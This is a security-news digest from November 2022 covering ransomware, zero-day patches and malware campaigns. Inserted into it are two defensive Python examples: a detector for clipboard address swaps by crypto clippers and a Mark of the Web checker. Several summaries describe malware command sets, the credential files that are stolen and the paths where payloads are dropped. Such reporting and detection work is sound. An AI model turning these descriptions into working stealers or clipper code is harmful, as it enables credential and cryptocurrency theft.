                2022-11-10 https://thehackernews.com/2022/11/is-cybersecurity-awareness-month.html
                Cybersecurity Awareness Month has been going on since 2004. This year, Cybersecurity Awareness Month urged the public, professionals, and industry partners to "see themselves in cyber" in the following ways:  The public, by taking action to stay safe online. Professionals, by joining the cyber workforce. Cyber industry partners, as part of the cybersecurity solution. CISA outlined four "things "

                Autosummary: Advice implementation from Cyber Security Awareness Month 2022 The CISA "four things you can do" initiative for the 2022 Cybersecurity Awareness Month, including updating software, thinking before they click to prevent phishing, using strong passwords, and enabling multifactor authentication was publicized aiming to influence end-user behavior toward better security practices.This year, Cybersecurity Awareness Month urged the public, professionals, and industry partners to "see themselves in cyber" in the following ways: The public, by taking action to stay safe online. CISA outlined four "things you can do" to stay safe online for individuals and families, including updating their software, thinking before they click, using strong passwords, and enabling multifactor authentication on sensitive accounts. "


                A bug in ABB Totalflow flow computers exposed oil and gas companies to attack

                exploits industry
                2022-11-10 https://securityaffairs.co/wordpress/138331/security/abb-totalflow-flaw.html

                A flaw in the ABB Totalflow system used in oil and gas organizations could be exploited by an attacker to inject and execute arbitrary code. Researchers from industrial security firm Claroty disclosed details of a vulnerability affecting ABB Totalflow flow computers and remote controllers. Flow computers are used to calculate volume and flow rates for oil […]

                The post A bug in ABB Totalflow flow computers exposed oil and gas companies to attack appeared first on Security Affairs.

                "

                Autosummary: "


                FBI warns scammers now impersonate refund payment portals

                financial
                2022-11-10 https://www.bleepingcomputer.com/news/security/fbi-warns-scammers-now-impersonate-refund-payment-portals/
                The FBI warns that tech support scammers are now impersonating financial institutions' refund payment portals to harvest victims' sensitive information and add legitimacy. [...] "

                Autosummary: "


                Russian LockBit ransomware operator arrested in Canada

                exploits ransomware
                2022-11-10 https://www.bleepingcomputer.com/news/security/russian-lockbit-ransomware-operator-arrested-in-canada/
                Europol has announced today the arrest of a Russian national linked to LockBit ransomware attacks targeting critical infrastructure organizations and high-profile companies worldwide. [...] "

                Autosummary: Law enforcement agents also seized eight computers and 32 external hard drives, two firearms, and €400,000 worth of cryptocurrency from the suspect's home. Europol added that this LockBit operator "was one of Europol's high-value targets due to his involvement in numerous high-profile ransomware cases," and he is known for trying to extort victims with ransom demands of between €5 and €70 million. "


                Update your Lenovo laptop’s firmware now! Flaws could help malware survive a hard disk wipe

                exploits
                2022-11-10 https://www.tripwire.com/state-of-security/laptop-flaws-could-help-malware-survive-hard-disk-wipe
                PC manufacturer Lenovo has been forced to push out a security update to more than two dozen of its laptop models, following the discovery of high severity vulnerabilities that could be exploited by malicious hackers. Security researchers at ESET discovered flaws in 25 of its laptop models - including IdeaPads, Slims, and ThinkBooks - that could be used to disable the UEFI Secure Boot process. Read more in my article on the Tripwire State of Security blog. "

                Autosummary: "


                Warning: New Massive Malicious Campaigns Targeting Top Indian Banks' Customers

                financial
                2022-11-10 https://thehackernews.com/2022/11/warning-this-widespread-malicious.html
                Cybersecurity researchers are warning of "massive phishing campaigns" that distribute five different malware targeting banking users in India. "The bank customers targeted include account subscribers of seven banks, including some of the most well-known banks located in the country and potentially affecting millions of customers," Trend Micro said in a report published this week. Some of the "

                Autosummary: "


                Microsoft fixes MoTW zero-day used to drop malware via ISO files

                exploits
                2022-11-10 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-motw-zero-day-used-to-drop-malware-via-iso-files/
                Windows has fixed a bug that prevented Mark of the Web flags from propagating to files within downloaded ISO files, dealing a massive blow to malware distributors and developers. [...] "

                Autosummary: Mark of the Web propagated to files inside an ISO Source: BleepingComputer Two other MoTW bugs fixed In addition to fixing ISO MoTW propagation, the November updates also fixed two MoTW bugs discovered and reported by Will Dormann, a senior vulnerability analyst at ANALYGENCE, with one actively exploited in the wild by threat actors. "


                US Health Dept warns of Venus ransomware targeting healthcare orgs

                exploits ransomware
                2022-11-10 https://www.bleepingcomputer.com/news/security/us-health-dept-warns-of-venus-ransomware-targeting-healthcare-orgs/
                The U.S. Department of Health and Human Services (HHS) warned today that Venus ransomware attacks are also targeting the country's healthcare organizations. [...] "

                Autosummary: "


                Russian military hackers linked to ransomware attacks in Ukraine

                exploits ransomware
                2022-11-10 https://www.bleepingcomputer.com/news/security/russian-military-hackers-linked-to-ransomware-attacks-in-ukraine/
                A series of attacks targeting transportation and logistics organizations in Ukraine and Poland with Prestige ransomware since October have been linked to an elite Russian military cyberespionage group. [...] "

                Autosummary: "


                Worok hackers hide new malware in PNGs using steganography

                exploits
                2022-11-10 https://www.bleepingcomputer.com/news/security/worok-hackers-hide-new-malware-in-pngs-using-steganography/
                A threat group tracked as "Worok" hides malware within PNG images to infect victims' machines with information-stealing malware without raising alarms. [...] "

                Autosummary: The commands are stored in encrypted files on the threat actor's DropBox repository that the malware accesses periodically to retrieve pending actions. Form of DropBox files, TaskType is command (Source: Avast). The supported commands are the following: run "cmd /c" with the given parameters; launch an executable with given parameters; download data from DropBox to the device; upload data from the device to DropBox; delete data on the victim's system; rename data on the victim's system; exfiltrate file info from a defined directory; set a new directory for the backdoor; exfiltrate system information; update the backdoor's configuration. These functions indicate that Worok is a cyberespionage group interested in stealthy data exfiltration, lateral movement, and spying on the infected device. "


                An $8 mess — Twitter Blue "verified" accounts push crypto scams

                financial
                2022-11-10 https://www.bleepingcomputer.com/news/security/an-8-mess-twitter-blue-verified-accounts-push-crypto-scams/
                Twitter has officially rolled out its Twitter Blue program for an $8 monthly fee that confers upon the Tweeter multiple benefits, including the much-sought blue badge. But, all this has led to its own set of problems, such as threat actors now impersonating famous people and still being granted a "verified" status. [...] "

                Autosummary: Elon Musk Twitter accounts—both carrying blue ticks (BleepingComputer). And it seems the process of impersonating prominent figures on Twitter and procuring a blue tick takes under 25 minutes: It took me less than 25 minutes to set up a fake anonymous Apple ID using a VPN and disposable email, attach a masked debit card to it (with the address being Twitter's HQ), and get a verified account for a prominent figure. Anyone can get a blue tick mark for $8 but not the badge ("profile") such as "Official" or "${country} official government account" or "Musician" etc. "


                Apple out-of-band patches fix remote code execution bugs in iOS and macOS

                exploits
                2022-11-10 https://securityaffairs.co/wordpress/138355/security/apple-out-of-band-patches.html

                Apple released out-of-band patches for iOS and macOS to fix a couple of code execution vulnerabilities in the libxml2 library. Apple released out-of-band patches for iOS and macOS to address two code execution flaws, tracked as CVE-2022-40303 and CVE-2022-40304, in the libxml2 library for parsing XML documents. The two vulnerabilities were discovered by Google Project […]

                The post Apple out-of-band patches fix remote code execution bugs in iOS and macOS appeared first on Security Affairs.

                "

                Autosummary: "


                Phishing drops IceXLoader malware on thousands of home, corporate devices

                financial exploits
                2022-11-10 https://www.bleepingcomputer.com/news/security/phishing-drops-icexloader-malware-on-thousands-of-home-corporate-devices/
                An ongoing phishing campaign has infected thousands of home and corporate users with a new version of the "IceXLoader" malware. [...] "

                Autosummary: PowerShell commands to disable AV and add exemptions (Minerva Labs) The commands supported by the loader are the following: Stop execution Collect system info and exfiltrate to C2 Display dialog box with specified message Restart IceXLoader Send GET request to download a file and open it with “cmd/ C” Send GET request to download an executable to run it from memory Load and execute a .NET assembly Change C2 server beaconing interval Update IceXLoader Remove all copies from the disk and stop running Minerva reports that the threat actors behind this campaign aren’t interested in securing the stolen data, as the SQLite database holding stolen information is accessible in the C2 address. "


                Microsoft fixes Windows zero-day bug exploited to push malware

                exploits
                2022-11-10 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-windows-zero-day-bug-exploited-to-push-malware/
                Windows has fixed a bug that prevented Mark of the Web flags from propagating to files within downloaded ISO files, dealing a massive blow to malware distributors and developers. [...] "

                Autosummary: Mark of the Web propagated to files inside an ISO Source: BleepingComputer Two other MoTW bugs fixed In addition to fixing ISO MoTW propagation, the November updates also fixed two MoTW bugs discovered and reported by Will Dormann, a senior vulnerability analyst at ANALYGENCE, with one actively exploited in the wild by threat actors. "


                Armis and NextGen Cyber Talent join forces to address the shortage of cybersecurity experts

                ciber
                2022-11-09 https://www.helpnetsecurity.com/2022/11/09/armis-nextgen-cyber-talent/

                Armis partners with non-profit NextGen Cyber Talent to help develop the next generation of cybersecurity professionals. NextGen Cyber Talent is on a mission to successfully educate cohorts of underprivileged and underserved students about cyber technologies and address the talent shortage by providing students with professional development enabling them to pursue careers in cybersecurity. Armis is supporting the non-profit by offering certified classes for students taught by Armis team members and by furthering the organization’s impact … More

                The post Armis and NextGen Cyber Talent join forces to address the shortage of cybersecurity experts appeared first on Help Net Security.

                "

                Autosummary: “We need to recognize and address that not only on days like today – National STEM/STEAM Day, which draws attention to the importance of providing education on and cultivating talent across science, technology, engineering, art, and mathematics – but on an ongoing basis to make a real difference. "


                Install Latest Windows Update ASAP! Patches Issued for 6 Actively Exploited Zero-Days

                exploits
                2022-11-09 https://thehackernews.com/2022/11/install-latest-windows-update-asap.html
                Microsoft's latest round of monthly security updates has been released with fixes for 68 vulnerabilities spanning its software portfolio, including patches for six actively exploited zero-days. 12 of the issues are rated Critical, two are rated High, and 55 are rated Important in severity. This also includes the weaknesses that were closed out by OpenSSL the previous week. Also separately "

                Autosummary: The list of actively exploited vulnerabilities, which allow privilege elevation and remote code execution, is as follows - CVE-2022-41040 (CVSS score: 8.8) - Microsoft Exchange Server Elevation of Privilege Vulnerability (aka ProxyNotShell); CVE-2022-41082 (CVSS score: 8.8) - Microsoft Exchange Server Elevation of Privilege Vulnerability (aka ProxyNotShell); CVE-2022-41128 (CVSS score: 8.8) - "


                Ransomware is the biggest concern for most organizations

                exploits
                2022-11-09 https://www.helpnetsecurity.com/2022/11/09/organizations-threat-survey-video/

                SonicWall released the 2022 SonicWall Threat Mindset Survey which found that 66% of customers are more concerned about cyberattacks in 2022, with the main threat being focused on financially motivated attacks like ransomware. This Help Net Security video provides information from a survey on how organizations are keeping pace with the fast-moving threat landscape, as they orient their business, networks, data and employees against unwavering cyberattacks.

                The post Ransomware is the biggest concern for most organizations appeared first on Help Net Security.

                "

                Autosummary: "


                APT29 Exploited a Windows Feature to Compromise European Diplomatic Entity Network

                exploits
                2022-11-09 https://thehackernews.com/2022/11/apt29-exploited-windows-feature-to.html
                The Russia-linked APT29 nation-state actor has been found leveraging a "lesser-known" Windows feature called Credential Roaming as part of its attack against an unnamed European diplomatic entity. "The diplomatic-centric targeting is consistent with Russian strategic priorities as well as historic APT29 targeting," Mandiant researcher Thibault Van Geluwe de Berlaere said in a technical write-up. "

                Autosummary: "


                New IceXLoader Malware Loader Variant Infected Thousands of Victims Worldwide

                exploits
                2022-11-09 https://thehackernews.com/2022/11/new-icexloader-malware-loader-variant.html
                An updated version of a malware loader codenamed IceXLoader is suspected of having compromised thousands of personal and enterprise Windows machines across the world. IceXLoader is a commodity malware that's sold for $118 on underground forums for a lifetime license. It's chiefly employed to download and execute additional malware on breached hosts. This past June, Fortinet FortiGuard Labs said "

                Autosummary: "


                Experts observed Amadey malware deploying LockBit 3.0 Ransomware

                exploits ransomware
                2022-11-09 https://securityaffairs.co/wordpress/138292/malware/amadey-malware-deploying-lockbit-3-0.html

                Experts noticed that the Amadey malware is being used to deploy LockBit 3.0 ransomware on compromised systems. Researchers from AhnLab Security Emergency Response Center (ASEC) reported that the Amadey malware is being used to deploy LockBit 3.0 ransomware on compromised systems. Amadey Bot is a data-stealing malware that was first spotted in 2018; it also allows […]

                The post Experts observed Amadey malware deploying LockBit 3.0 Ransomware appeared first on Security Affairs.

                "

                Autosummary: "


                Microsoft Patch Tuesday updates fix 6 actively exploited zero-days

                exploits
                2022-11-09 https://securityaffairs.co/wordpress/138288/security/microsoft-patch-tuesday-november-2022.html

                Microsoft Patch Tuesday updates for November 2022 addressed 64 vulnerabilities, including six actively exploited zero-days. Microsoft Patch Tuesday updates for November 2022 addressed 64 new vulnerabilities in Microsoft Windows and Windows Components; Azure and Azure Real Time Operating System; Microsoft Dynamics; Exchange Server; Office and Office Components; SysInternals; Visual Studio; SharePoint Server; Network Policy Server […]

                The post Microsoft Patch Tuesday updates fix 6 actively exploited zero-days appeared first on Security Affairs.

                "

                Autosummary: The following vulnerabilities are actively exploited: CVE-2022-41028 – Microsoft Exchange Server Remote Code Execution Vulnerability CVE-2022-41040 – Microsoft Exchange Server Elevation of Privilege Vulnerability CVE-2022-41128 – Windows Scripting Languages Remote Code Execution Vulnerability CVE-2022-41091 – Windows Mark of the Web Security Feature Bypass Vulnerability CVE-2022-41073 – Windows Print Spooler Elevation of Privilege Vulnerability CVE-2022-41125 – Windows CNG Key Isolation Service Elevation of Privilege Vulnerability “These vulnerabilities affect Exchange Server. "


                Medibank warns customers their data was leaked by ransomware gang

                financial exploits ransomware
                2022-11-09 https://www.bleepingcomputer.com/news/security/medibank-warns-customers-their-data-was-leaked-by-ransomware-gang/
                Australian health insurance giant Medibank has warned customers that the ransomware group behind last month's breach has started to leak data stolen from its systems. [...] "

                Autosummary: The data Medibank believes was exposed in last month's breach includes the following: name, date of birth, address, phone number, and email address for approximately 9.7 million current and former customers and authorized representatives; Medicare numbers (but not expiry dates) for ahm health insurance (ahm) customers; passport numbers (but not expiry dates) and visa details for international student customers; health claims data for roughly 480,000 Medibank, ahm, and international customers; health provider details, including names, provider numbers, and addresses. However, according to Medibank, "given the nature of this crime, unfortunately we now believe that all of the customer data accessed could have been taken by the criminal. "


                Having refused to pay ransom, health insurer Medibank sees customer data posted online by hackers

                financial
                2022-11-09 https://www.bitdefender.com/blog/hotforsecurity/having-refused-to-pay-ransom-health-insurer-medibank-sees-customer-data-posted-online-by-hackers/
                A ransomware gang has begun to publish data on the dark web stolen from Australia's largest health insurer Medibank. Curiously, the hackers have released details of insured customers, sorted into two files bearing the label "naughty-list" and "good-list." Read more in my article on the Hot for Security blog. "



                Surveillance vendor exploited Samsung phone zero-days

                exploits
                2022-11-09 https://securityaffairs.co/wordpress/138302/hacking/surveillance-vendor-exploited-samsung-phone-zero-days.html

                Google Project Zero researchers reported that a surveillance vendor is using three Samsung phone zero-day exploits. Google Project Zero disclosed three Samsung phone vulnerabilities, tracked as CVE-2021-25337, CVE-2021-25369 and CVE-2021-25370, that have been exploited by a surveillance company. The three issues are: The researchers pointed out that the surveillance firm included in its spyware the […]

                The post Surveillance vendor exploited Samsung phone zero-days appeared first on Security Affairs.

                "

                Autosummary: “When in-the-wild 0-days are not transparently disclosed, we are not able to use that information to further protect users, using patch analysis and variant analysis, to gain an understanding of what attackers already know.” concludes the report. "


                Finite State hires Larry Pesce as Product Security Research and Analysis Director

                government
                2022-11-09 https://www.helpnetsecurity.com/2022/11/10/finite-state-larry-pesce/

                Finite State has hired Larry Pesce as its Product Security Research and Analysis Director. Pesce will serve as a senior consultant, providing expert guidance and services to product security teams worldwide, including product security program design and development, product red-teaming and penetration testing, software supply chain risk management, and vulnerability management. Recent research from the Ponemon Institute indicates that six of every ten organizations find it increasingly difficult to quickly respond to new vulnerability disclosures … More

                The post Finite State hires Larry Pesce as Product Security Research and Analysis Director appeared first on Help Net Security.

                "



                Bugcrowd appoints Dave Gerry as CEO

                exploits
                2022-11-09 https://www.helpnetsecurity.com/2022/11/10/bugcrowd-dave-gerry/

                Bugcrowd announced the appointment of Dave Gerry as Chief Executive Officer (CEO). As CEO, Gerry will oversee operations, drive growth and profitability, and manage the company’s overall strategy. This appointment follows another year of rapid growth for the company, which has experienced record customer adoption of its crowdsourced cybersecurity solutions and represents the next step in Bugcrowd’s global expansion strategy. Bugcrowd partners with hundreds of clients including: CISA/Department of Homeland Security, BigCommerce, Monash University, TX … More

                The post Bugcrowd appoints Dave Gerry as CEO appeared first on Help Net Security.

                "

                Autosummary: “From our inception, the mission of the Bugcrowd platform has been to connect the latent potential of the good-faith hacker community with cybersecurity’s unmet demands—unlocking an army of allies to outsmart an army of adversaries,” said Casey Ellis, Founder, Chairperson, and CTO. "


                New StrelaStealer malware steals your Outlook, Thunderbird accounts

                exploits
                2022-11-09 https://www.bleepingcomputer.com/news/security/new-strelastealer-malware-steals-your-outlook-thunderbird-accounts/
                A new information-stealing malware named "StrelaStealer" is actively stealing email account credentials from Outlook and Thunderbird, two widely used email clients. [...] "

                Autosummary: [Figure: the lure document opened by StrelaStealer (source: DCSO CyTec)] StrelaStealer details: upon execution, StrelaStealer searches the "%APPDATA%\Thunderbird\Profiles\" directory for "logins.json" (account and password) and "key4.db" (password database) and exfiltrates their contents to the C2 server. "


                Exposing Emotet and its cybercriminal supply chain

                ciber
                2022-11-08 https://www.helpnetsecurity.com/2022/11/08/exposing-emotet-cybercriminal-supply-chain-video/

                Emotet, one of the most evasive and destructive malware delivery systems, caused substantial damage during its initial reign. After a coordinated takedown by authorities in early 2021, Emotet has reemerged as a global threat that will persist for organizations. In this Help Net Security video, Chad Skipper, Global Security Technologist at VMware, unpacks insights learned from Emotet’s most recent resurgence in hopes that organizations can better understand and defend themselves against this resilient malware.

                The post Exposing Emotet and its cybercriminal supply chain appeared first on Help Net Security.

                "



                How geopolitical turmoil changed the cybersecurity threat landscape

                industry ciber
                2022-11-08 https://www.helpnetsecurity.com/2022/11/08/cybersecurity-threat-landscape-2022/

                ENISA, EU’s Agency for Cybersecurity, released its annual Threat Landscape report, covering the period from July 2021 up to July 2022. Cybersecurity threat landscape in 2022 With more than 10 terabytes of data stolen monthly, ransomware still fares as one of the prime threats in the new report with phishing now identified as the most common initial vector of such attacks. The other threats to rank highest along ransomware are attacks against availability also called … More

                The post How geopolitical turmoil changed the cybersecurity threat landscape appeared first on Help Net Security.

                "

                Autosummary:
                - Ransomware: 60% of affected organizations may have paid ransom demands
                - Malware: 66 disclosures of zero-day vulnerabilities observed in 2021
                - Social engineering: phishing remains a popular technique, but new forms of phishing are arising, such as spear-phishing, whaling, smishing and vishing
                - Threats against data: increasing proportionally to the total of data produced
                - Disinformation – misinformation: escalating AI-enabled disinformation, deepfakes and disinformation-as-a-service
                - Supply chain targeting: third-party incidents account for 17% of the intrusions in 2021 compared to less than 1% in 2020
                - Threats against availability: the largest denial of service (DDoS) attack ever was launched in Europe in July 2022; Internet: destruction of infrastructure, outages and rerouting of internet traffic. "


                Auto retailers are falling victim to sophisticated phishing

                financial
                2022-11-08 https://www.helpnetsecurity.com/2022/11/08/cybercriminals-auto-retailers-video/

                Cybercriminals are getting craftier as auto retailers continue to fall victim to well-disguised cyberattacks. According to the second annual dealership cybersecurity study by CDK Global, 15% of dealers have experienced a cybersecurity incident in the past year. This Help Net Security video reveals what steps auto retailers are taking to get ready for an increase in potential infrastructure attacks.

                The post Auto retailers are falling victim to sophisticated phishing appeared first on Help Net Security.

                "



                Medibank confirms ransomware attack impacting 9.7M customers, but doesn’t pay the ransom

                financial exploits ransomware
                2022-11-08 https://securityaffairs.co/wordpress/138243/cyber-crime/medibank-confirms-ransomware-attack.html

                Australian health insurer Medibank confirmed that personal data belonging to around 9.7 million current and former customers was exposed as a result of a recent ransomware attack. Medibank is one of the […]

                The post Medibank confirms ransomware attack impacting 9.7M customers, but doesn’t pay the ransom appeared first on Security Affairs.

                "

                Autosummary: This figure represents around 5.1 million Medibank customers, around 2.8 million ahm customers and around 1.8 million international customers. Also exposed:
                - Medicare numbers (but not expiry dates) for ahm customers
                - Passport numbers (but not expiry dates) and visa details for international student customers
                - Health claims data for around 160,000 Medibank customers, around 300,000 ahm customers and around 20,000 international customers. "


                Malicious droppers on Google Play deliver banking malware to victims

                financial exploits
                2022-11-08 https://www.helpnetsecurity.com/2022/11/08/google-play-malware-droppers/

                Android users are often advised to get mobile apps from Google Play, the company’s official app marketplace, to minimize the possibility of downloading malware. After all, Google analyzes apps before allowing them on the market. Unfortunately, time after time, we read about malware peddlers finding ways around that vetting process. “Distribution through droppers on official stores remains one of the most efficient ways for threat actors to reach a wide and unsuspecting audience. Although other … More

                The post Malicious droppers on Google Play deliver banking malware to victims appeared first on Help Net Security.

                "

                Autosummary: Evasion techniques of malware droppers on Google Play These trojanized, functional apps – usually file managers, file recovery tools, or security (2FA) authenticators – are crafted to conceal their malicious nature from Google Play Protect, antivirus solutions, researchers, and users: they provide the advertized functionality, request few common permissions that don’t raise suspicion, and don’t contain overtly malicious code. "


                Amadey Bot Spotted Deploying LockBit 3.0 Ransomware on Hacked Machines

                exploits ransomware
                2022-11-08 https://thehackernews.com/2022/11/amadey-bot-spotted-deploying-lockbit-30.html
                The Amadey malware is being used to deploy LockBit 3.0 ransomware on compromised systems, researchers have warned. "Amadey bot, the malware that is used to install LockBit, is being distributed through two methods: one using a malicious Word document file, and the other using an executable that takes the disguise of the Word file icon," AhnLab Security Emergency Response Center (ASEC) said in a "



                New Laplas Clipper Malware Targeting Cryptocurrency Users via SmokeLoader

                exploits
                2022-11-08 https://thehackernews.com/2022/11/new-laplas-clipper-malware-targeting.html
                Cryptocurrency users are being targeted with a new clipper malware strain dubbed Laplas by means of another malware known as SmokeLoader. SmokeLoader, which is delivered by means of weaponized documents sent through spear-phishing emails, further acts as a conduit for other commodity trojans like SystemBC and Raccoon Stealer 2.0, according to an analysis from Cyble. Observed in "

                Autosummary: " The newest clipper malware offers support for a variety of wallets like Bitcoin, Ethereum, Bitcoin Cash, Litecoin, Dogecoin, Monero, Ripple, Zcash, Dash, Ronin, TRON, Cardano, Cosmos, Tezos, Qtum, and Steam Trade URL. "


                SmokeLoader campaign distributes new Laplas Clipper malware

                exploits
                2022-11-08 https://securityaffairs.co/wordpress/138251/malware/smokeloader-delivers-laplas-clipper.html

                Researchers observed a SmokeLoader campaign that is distributing a new clipper malware dubbed Laplas Clipper that targets cryptocurrency users. Cyble researchers uncovered a SmokeLoader campaign that is distributing commodity malware, such as SystemBC and Raccoon Stealer 2.0, along with a new clipper malware tracked as Laplas. The experts detected more than 180 different samples of the clipper […]

                The post SmokeLoader campaign distributes new Laplas Clipper malware appeared first on Security Affairs.

                "

                Autosummary: This clipper can target multiple wallets, including Bitcoin, Ethereum, Bitcoin Cash, Litecoin, Dogecoin, Monero, Ripple, ZCash, Dash, Ronin, Tron, and Steam Trade URL. "
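The two Laplas items above describe the clipper technique only in outline: the malware watches the clipboard and, when the user copies a wallet address, replaces it with an attacker-controlled address of the same coin, so the victim pastes the wrong destination. The following Python is an added example, not code from Cyble or from either write-up, showing the detection side of that behaviour over a constructed clipboard history: a swap is flagged when one address is replaced by a different address of the same coin within a short window. The ClipEvent shape, the process names, the two-second window and the address regexes (syntactic shape only, no checksum validation) are assumptions for illustration; the two Bitcoin strings are the public example addresses from the genesis block and BIP-173.

```python
import re
from dataclasses import dataclass

# Address shapes for the two most commonly clipped coins; the table can be
# extended with the other coins the write-ups list. Shape only, no checksum:
# a clipper only needs the shape, and so does the detector.
ADDRESS_PATTERNS = {
    "btc": re.compile(r"^(?:bc1[a-z0-9]{25,59}|[13][a-km-zA-HJ-NP-Z1-9]{25,34})$"),
    "eth": re.compile(r"^0x[0-9a-fA-F]{40}$"),
}


@dataclass
class ClipEvent:
    t: float      # seconds since monitoring started
    text: str     # clipboard text content
    owner: str    # process that set the clipboard, as reported by the OS (assumed field)


def classify(text: str):
    """Return the coin whose address shape <text> matches, else None."""
    s = text.strip()
    for coin, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(s):
            return coin
    return None


def detect_clipboard_swaps(history, window_s: float = 2.0):
    """A clipper's signature: the clipboard held an address and, moments later,
    holds a *different* address of the same coin. One alert per swap."""
    alerts = []
    for prev, cur in zip(history, history[1:]):
        coin = classify(prev.text)
        if (coin and classify(cur.text) == coin
                and prev.text.strip() != cur.text.strip()
                and 0 <= cur.t - prev.t <= window_s):
            alerts.append({"coin": coin, "copied": prev.text, "replaced_with": cur.text,
                           "replaced_by": cur.owner, "after_s": cur.t - prev.t})
    return alerts


# Constructed clipboard timeline: a BTC address copied from the browser is
# overwritten 200 ms later by another process; the later ETH addresses are
# synthetic and 35 s apart, i.e. two separate user copies.
SAMPLE_HISTORY = [
    ClipEvent(10.0, "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa", "chrome.exe"),
    ClipEvent(10.2, "bc1qar0srrr7xfkvy5l643lydnw9re59gtzzwf5mdq", "updater.exe"),
    ClipEvent(35.0, "0x" + "ab" * 20, "chrome.exe"),
    ClipEvent(70.0, "0x" + "cd" * 20, "chrome.exe"),
    ClipEvent(71.0, "meeting moved to 3pm", "notepad.exe"),
]

if __name__ == "__main__":
    for alert in detect_clipboard_swaps(SAMPLE_HISTORY):
        print(alert)
```

The window is the tuning knob: a real clipper rewrites the clipboard within milliseconds of the user's copy, so a short window keeps ordinary copy-paste of several addresses (the two ETH events) from alerting, while the owner field tells the responder which process to pull.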


                VMware fixes three critical auth bypass bugs in remote access tool

                exploits
                2022-11-08 https://www.bleepingcomputer.com/news/security/vmware-fixes-three-critical-auth-bypass-bugs-in-remote-access-tool/
                VMware has released security updates to address three critical severity vulnerabilities in the Workspace ONE Assist solution that enable remote attackers to bypass authentication and elevate privileges to admin. [...] "



                Microsoft fixes ProxyNotShell Exchange zero-days exploited in attacks

                exploits
                2022-11-08 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-proxynotshell-exchange-zero-days-exploited-in-attacks/
                Microsoft has released security updates to address two high-severity Microsoft Exchange zero-day vulnerabilities collectively known as ProxyNotShell and exploited in the wild. [...] "

                Autosummary: Today, as part of the November 2022 Patch Tuesday, Microsoft finally released security updates to address the two vulnerabilities. "


                Microsoft November 2022 Patch Tuesday fixes 6 exploited zero-days, 68 flaws

                exploits
                2022-11-08 https://www.bleepingcomputer.com/news/microsoft/microsoft-november-2022-patch-tuesday-fixes-6-exploited-zero-days-68-flaws/
                Today is Microsoft's November 2022 Patch Tuesday, and with it comes fixes for six actively exploited Windows vulnerabilities and a total of 68 flaws. [...] "

                Autosummary: The number of bugs in each vulnerability category is listed below:
                - 27 Elevation of Privilege Vulnerabilities
                - 4 Security Feature Bypass Vulnerabilities
                - 16 Remote Code Execution Vulnerabilities
                - 11 Information Disclosure Vulnerabilities
                - 6 Denial of Service Vulnerabilities
                - 3 Spoofing Vulnerabilities
                The above counts do not include two OpenSSL vulnerabilities disclosed on November 2nd. The six actively exploited zero-day vulnerabilities fixed in today's updates are: CVE-2022-41128 - Windows Scripting Languages Remote Code Execution Vulnerability, discovered by Clément Lecigne of Google’s Threat Analysis Group. "This vulnerability requires that a user with an affected version of Windows access a malicious server. "


                Microsoft fixes many zero-days under attack

                exploits
                2022-11-08 https://www.helpnetsecurity.com/2022/11/08/cve-2022-41091-november-2022-patch-tuesday/

                November 2022 Patch Tuesday is here, with fixes for many vulnerabilities actively exploited in the wild, including CVE-2022-41091, a Windows Mark of the Web bypass flaw, and the ProxyNotShell MS Exchange vulnerabilities. Fixes to prioritize CVE-2022-41091 is a Windows zero-day vulnerability that allows attackers to bypass the Mark of the Web (MOTW) security feature. They can craft a malicious file triggering the flaw and deliver it either via a malicious or compromised website or via … More
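As an added example (not from Help Net Security or Microsoft), the following Python shows the check a responder can run once a Mark of the Web bypass is reported: does a downloaded file still carry the Zone.Identifier alternate data stream, and does that stream name an Internet zone? A file that arrived from the web and lacks that mark is exactly the state a bypass aims for, since SmartScreen and Office Protected View key off it. The parser handles the INI-style stream body Windows writes; the on-disk read only works on NTFS, and returns None elsewhere. The SAMPLE_STREAM content and the example.test URLs are constructed.

```python
import os

# URLZONE values used by Windows; 3 (Internet) and 4 (Restricted) are the ones
# that trigger Mark of the Web handling (SmartScreen, Protected View, warnings).
URLZONE_INTERNET = 3


def parse_zone_identifier(stream_text: str) -> dict:
    """Parse the INI-style body of a Zone.Identifier alternate data stream.
    Only keys under [ZoneTransfer] are returned; other sections are ignored."""
    values = {}
    section = None
    for raw in stream_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        if section == "ZoneTransfer" and "=" in line:
            key, value = line.split("=", 1)
            values[key.strip()] = value.strip()
    return values


def zone_id(stream_text: str):
    """ZoneId as an int, or None when the key is absent or malformed."""
    try:
        return int(parse_zone_identifier(stream_text).get("ZoneId", ""))
    except ValueError:
        return None


def is_marked_from_internet(stream_text: str) -> bool:
    z = zone_id(stream_text)
    return z is not None and z >= URLZONE_INTERNET


def read_zone_identifier(path: str):
    """Read the raw stream from an NTFS file (Windows only). None means there is
    no such stream, which is what a stripped or never-applied mark looks like;
    on non-NTFS volumes the answer is always None."""
    try:
        with open(f"{path}:Zone.Identifier", "r", encoding="utf-8", errors="replace") as f:
            return f.read()
    except OSError:
        return None


def unmarked_files(directory: str) -> list:
    """Names of regular files in <directory> that carry no Internet-zone mark."""
    found = []
    for name in os.listdir(directory):
        p = os.path.join(directory, name)
        if os.path.isfile(p) and not is_marked_from_internet(read_zone_identifier(p) or ""):
            found.append(name)
    return found


# Constructed example of what a browser writes for a downloaded file.
SAMPLE_STREAM = (
    "[ZoneTransfer]\r\n"
    "ZoneId=3\r\n"
    "ReferrerUrl=https://example.test/\r\n"
    "HostUrl=https://example.test/invoice.js\r\n"
)

if __name__ == "__main__":
    print(parse_zone_identifier(SAMPLE_STREAM))
    print("internet-marked:", is_marked_from_internet(SAMPLE_STREAM))
```

Run unmarked_files against a user's Downloads folder on the affected host: the hits are the files to triage first, and the HostUrl/ReferrerUrl values on the marked ones give the download origin without waiting on browser history.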

                The post Microsoft fixes many zero-days under attack appeared first on Help Net Security.

                "



                LockBit affiliate uses Amadey Bot malware to deploy ransomware

                exploits ransomware
                2022-11-08 https://www.bleepingcomputer.com/news/security/lockbit-affiliate-uses-amadey-bot-malware-to-deploy-ransomware/
                A LockBit 3.0 ransomware affiliate is using phishing emails that install the Amadey Bot to take control of devices and encrypt them. [...] "

                Autosummary: The payloads are again dropped in TEMP as one of the following three:
                - %TEMP%\1000018041\dd.ps1
                - %TEMP%\1000019041\cc.ps1
                - %TEMP%\1000020001\LBB.exe
                From there, LockBit encrypts the user's files and generates ransom notes demanding payment, threatening to publish stolen files on the group's extortion site. "
